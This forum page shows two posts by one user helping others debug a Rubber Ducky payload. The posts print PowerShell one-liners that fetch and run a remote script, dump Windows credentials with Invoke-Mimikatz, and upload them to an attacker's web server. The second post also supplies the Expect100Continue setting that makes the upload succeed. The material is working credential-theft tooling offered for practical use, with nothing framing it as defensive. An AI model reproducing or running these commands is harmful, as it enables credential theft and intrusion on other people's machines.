
shr00mie

Members
  • Posts

    3
  • Joined

  • Last visited

Posts posted by shr00mie

  1. 5 hours ago, mavieprivee said:

    In addition to my previous message:

    I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds

    With no data ;-(

    1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 

    2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz.

    IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)
  2. On 12/7/2016 at 3:54 PM, BrandonEckert said:

    Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output:

     

    C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)"


    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
    At line:1 char:204
    + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue =
    $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException

    i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTTP/1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component:

    http://www8.org/w8-papers/5c-protocols/key/key.html

    Quote

    Expect and 100 (Continue)

    Some HTTP requests (for example, the PUT or POST methods) carry request bodies, which may be arbitrarily long. If the server is not willing to accept the request, perhaps because of an authentication failure, it would be a waste of bandwidth to transmit such a large request body.

    HTTP/1.1 includes a new status code, 100 (Continue), to inform the client that the request body should be transmitted. When this mechanism is used, the client first sends its request headers, then waits for a response. If the response is an error code, such as 401 (Unauthorized), indicating that the server does not need to read the request body, the request is terminated. If the response is 100 (Continue), the client can then send the request body, knowing that the server will accept it.

    However, HTTP/1.0 clients do not understand the 100 (Continue) response. Therefore, in order to trigger the use of this mechanism, the client sends the new Expect header, with a value of 100-continue. (The Expect header could be used for other, future purposes not defined in HTTP/1.1.)

    Because not all servers use this mechanism (the Expect header is a relatively late addition to HTTP/1.1, and early ``HTTP/1.1'' servers did not implement it), the client must not wait indefinitely for a 100 (Continue) response before sending its request body. HTTP/1.1 specifies a number of somewhat complex rules to avoid either infinite waits or wasted bandwidth. We lack sufficient experience based on deployed implementations to know if this design will work efficiently.

    while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration.

    below is how i finally got the code to work without throwing any errors on the PS side.

    [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output )

    then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick.
